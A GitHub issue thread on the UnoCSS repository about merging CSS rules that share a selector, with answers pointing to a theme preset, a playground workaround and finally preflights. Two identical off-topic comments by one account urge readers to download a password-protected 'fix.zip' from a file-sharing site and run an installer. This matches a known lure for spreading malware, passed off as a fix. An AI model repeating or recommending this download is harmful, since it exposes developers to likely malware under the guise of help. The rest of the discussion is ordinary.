### ISSUE TITLE
Merge CSS rules with the same selector

### ISSUE THREAD

**Issue by awwwdev** [unocss/unocss#4102]
### UnoCSS version

0.62.3

### Describe the bug

Hi and thank you for building this amazing tool.

Currently, UnoCSS does not merge CSS rules with the same selector. 

For example, I have some rules and shortcuts that add CSS variables to the root (or a specific selector) whenever a color is used.

The result is like this:

![image](https://github.com/user-attachments/assets/2a0b50bf-f5c2-442b-8faa-5f4e7525f9ca)

Is there a way to achieve something like this (these are generated in preflight):
![image](https://github.com/user-attachments/assets/316b57bd-555e-47b6-8845-644a367a2eaa)

It would be great if there is a way to append rules to specific selectors for these cases and optimize CSS size.

I created a simple reproduction. 

### Reproduction

https://unocss.dev/play/?version=0.62.3&html=DwBwfACgNgpghgZxgAiSgLgCxQSwHYIgwDG6OA9nsAPTgBQdwAJjgG7LFSIIBycAtjAC8AcjhMmAWmLko5AE6T5MJiLA0WramEaaOXBLwHCxE6bIWSARlACuMNRrbbdbfdz6DR4qTLmKATxgoOQB3R2pNF2Y3Tg9jbzM-SwU4PABzB3VI5zAgA&config=JYWwDg9gTgLgBAbwFBzgEwKYDNgDsMDCEuOA5gDQpxhQYDOGMAgjDFMAEYCuMwWAnpVQ16jAJIBjYnSHVaDGAFVcESgF84WKBBBwA5FxUS6dPUiQYAHpFjpsAQy4AbeJhz4iJYKQAUyVFDO9ABccADaVKhhehJcdDA6ALSBThh65IhwUk7QoXq0aHpwagC6slEA9AB69mhoidnQiT4AdABUAJQAJBUZPmHkjVAAcvYgGCUdcAC8AHyIkahwFRVw9iZc43BicAAW9gBuGHCgNjAYaGtZEDlQ1PaprMcc2NAYLdtwANYqAO5wMF2wDo10w6Ag9FwengIHsX2ODFwIJAXAkuzg3HgwHgtBoEDQqOOgOOwLoXHeiwCjC4UFwcAABi0nN5djBEsStv4lqhEg0bk0ugghqNxmpQgd7FAfLyhokwA9GOdEoLhWMMGoOgBuSnFemLNRIEo6spUOi7aAwWIwOihLmoGJxBIgRJmi1WvR5c6WNlOUgAqxs6D2XCkY7mo5QYJetnnB7pKhqWQiBQ28KLZOMZQQHwdcpyUTMVjsTF8fg5vMZmCSaR%2BHV0CQK0IARhaACY86gJGhcHlWTAwDaVvQQC0zRV49yNbITRqkEA&css=PQKgBA6gTglgLgUzAYwK4Gc4HsC2YDCAyoWABYJQIA0YAhgHYAmYcUD6AZllDhWOqgAOg7nAB0YAGLcwCAB60cggDYIAXGBDAAUKDBi0mXGADe2sGC704AWgDuCGAHNScDQFYADJ4Dc5sAACtMLKAJ5gggCMLPK2ABR2pPBIcsoAlH4WAEa0yADWTlBYqEw2yFjK3Bpw5LxxAOTllVDoYpSMYgAs3vUZ2gC%2BmsBAA&options=N4IgLgTghgdgzgMwPYQLYGECucxIwZXxAC4EoAbOAUwBpxp5k0AJMVcksyqgXyA

### System Info

NextJS + UnoCSS CLI

### Validations

- [X] Read the [Contributing Guidelines](https://github.com/unocss/unocss/blob/main/CONTRIBUTING.md).
- [X] Check that there isn't [already an issue](https://github.com/unocss/unocss/issues) that reports the same bug to avoid creating a duplicate.
- [X] Check that this is a concrete bug. For Q&A open a [GitHub Discussion](https://github.com/unocss/unocss/discussions) or join our [Discord Chat Server](https://chat.antfu.me).
- [X] The provided reproduction is a [minimal reproducible example](https://stackoverflow.com/help/minimal-reproducible-example) of the bug.

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by henrikvilhelmberglund** [comment]
You could try https://github.com/unpreset/unocss-preset-theme.

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by awwwdev** [comment]
> You could try https://github.com/unpreset/unocss-preset-theme.

I am creating another preset that works differently. I also check it source code but couldn't find anything that help with my problem.

**Comment by henrikvilhelmberglund** [comment]
> > You could try https://github.com/unpreset/unocss-preset-theme.
> 
> I am creating another preset that works differently. I also check the source code but couldn't find anything that help with my problem.

It creates CSS variables in the root like in the image you posted:

> Is there a way to achieve something like this (these are generated in preflight): ![image](https://private-user-images.githubusercontent.com/78935540/361419701-316b57bd-555e-47b6-8845-644a367a2eaa.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ2Nzk5MDQsIm5iZiI6MTcyNDY3OTYwNCwicGF0aCI6Ii83ODkzNTU0MC8zNjE0MTk3MDEtMzE2YjU3YmQtNTU1ZS00N2I2LTg4NDUtNjQ0YTM2N2EyZWFhLnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA4MjYlMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwODI2VDEzNDAwNFomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTY5ZDhkNThlNjc2NTZhZGY5ZjExYTc3ZDYyZjllNDZlODQ0MGNjNWQzYmM5NTJhNTBmNWZlYWEyYTBlY2ZjYTImWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.o-w8-H7FyXk0H47RK8ccZ_HvdVrc_8kYg7nHtWWacaw)

Not really a solution for the issue but could be used instead of the rules to create the CSS variables.

**Comment by awwwdev** [comment]
@henrikvilhelmberglund I am creating a preset with some custom needs and cannot use unocss-preset-them. I was aware of this preset. 
But I noticed it uses variant and also in my generated uno.css all rules are grouped inside one media query. Like this:

![image](https://github.com/user-attachments/assets/b2e48f25-027a-47ae-985d-65df28d2c7fd)

So I guess I could find a workaround by using variants. Unfortunately there is not much about variants in the docs.

**Comment by henrikvilhelmberglund** [comment]
This is really hacky but does this look like the effect you want? (everything under .light-mode{} instead of several .light-mode{}, ignoring the extra `;` and stuff)

https://unocss.dev/play/?version=0.62.3&html=DwBwfACgNgpghgZxgAiSgLgCxQSwHYIgwDG6OA9nsAPTgBQwAJjgG7LFSIIC8ARFDgDmmdAFoAtuUYoA2qNHFyUcgCdRIOLHToYogEZQArjABcAYgAMVizBgBdZMjkKlq9ZpjbdKmI3O3rCwdnRWU1DS0dUQBPGChlAHdzADMANmS0xmD5ULcIzyjVODxBUzMMuD0ARgB2O14wOkcmVnZOBAQAOThxGG4Acly1H0Z%2B1HRo2D49OGIAa0EVckM8RhcwkxY4FQAKHNdh3wBKAG4GuBpmFkbmq7aubt6Bof0jGDGECaneGfnF5dW61Um22eyBagMxlODT0l1YN2QLTYHAePT6gwOMTiiQ%2BXz6P1mCyWKzWQxBu32YSx8XICWhYGIcOuTURdxRHUe6JeRRK73Gk3xvyJANJB3JYO5KmKpXpjCZjXlQA&config=JYWwDg9gTgLgBAbzgEwKYDNgDtUGEJaYDmANHGFKgM6owCCMMUwARgK4zDoCeZF1tAJIBjAlT6UaMAKpYIcAL5x0UCCDgByNnOFUqGgFAHUAD0iwUGAIZsANvDSYc%2BQsCIAKBAbhwQqKESoAMqotqjCMNBUAFxwTGyoJN5wUHbUsQDayT4ZGsJsVJEgALSpYRpkSKK20LEalMgaigC6ST452e0A9AB61dDF7gB0AFQAlAAkXW3tPujaEcAEI3DuGWT9UAByVn6tiHBU3CAsELZUimOInbNdXXBWemx%2BcIJwABZWAG6ocKDmMFQyAecE25CsYUYvxYGGgqCGrzgAGs5AB3OLvYAXURoFAQahYDTwEBWJG-GhYC4gNjCd5wdjwYDwSgUCDIGm-GDvX5YqgJIY3drcYChYFeWYSuAZI4nM5UIZgKyULAwZqxAAGQ1sbneMGKIDZv3VM0lORlp3OQxoYQi0DVq2t4UiUCuAF4AHyCyXqgDcxWKEwQjttUCtYG1MHcGiGGjGGQAjM0FLEvkr3P7NsVFZDAQGEJsdn4FGMfcave0NBo6hVywpBXXZq1kk2fFR3tAYPkYDFrrM8gUisU2x2u1XNICTHrbEQ4qY9dArFhAh8ID8oNEJ3rARCaz4FDN%2BFIe1lZofaLIIO4xibyJJaAwmKwOFxuFeb2eYCIxJ5BVRhBDUFieMhgAJhvHxhGQLA6l1GAwBiO5qBAK13i6Xd2mLGYm2LAwgA&css=PQKgBA6gTglgLgUzAYwK4Gc4HsC2YDCAyoWABYJQIA0YAhgHYAmYcUD6AZllDhWOqgAOg7nAB0YAGLcwCAB60cggDYIAXGBDAAUKDBi0mXGADe2sGC704AWgDuCGAHNScDQFYADJ4Dc5sAACtMLKAJ5gggCMLPK2ABR2pPBIcsoAlH4WAEa0yADWTlBYqEw2yFjK3Bpw5LxxAOTllVDoYpSMYgAs3vUZ2gC%2BmsBAA&options=N4IgLgTghgdgzgMwPYQLYGECucxIwZXxAC4EoAbOAUwBpxp5k0AJMVcksyqgXyA

**Comment by awwwdev** [comment]
Wow. Smart! It is hacky, but does the size optimization. Maybe I could play around with it and find a way to eliminate extra "," and stuff. 

BTW, I checked the source code of 'unocss-preset-theme' but couldn't figure out how it has been able to achieve this. 

For now, I'll move forward with your approach. 
Feel free to mark this as solved. I'll update this thread if I found something better. 
Thank you for your help.

**Comment by zyyv** [comment]
Although `UnoCSS` is open to `rules`, such usage is too customized. Uno has the behavior of merging, but such css does not even have a `selector`, it is just a string, and it is difficult to get its context.
I think you have already got a better way to use it in the comments above, thank you 🙏

**Comment by awwwdev** [comment]
@zyyv  Thank you. I find out that I can use preflights for that. 
Basically I use shortcuts to detect CSS variables I need to add, store them in a object, then use that object in preflights to generate the CSS.
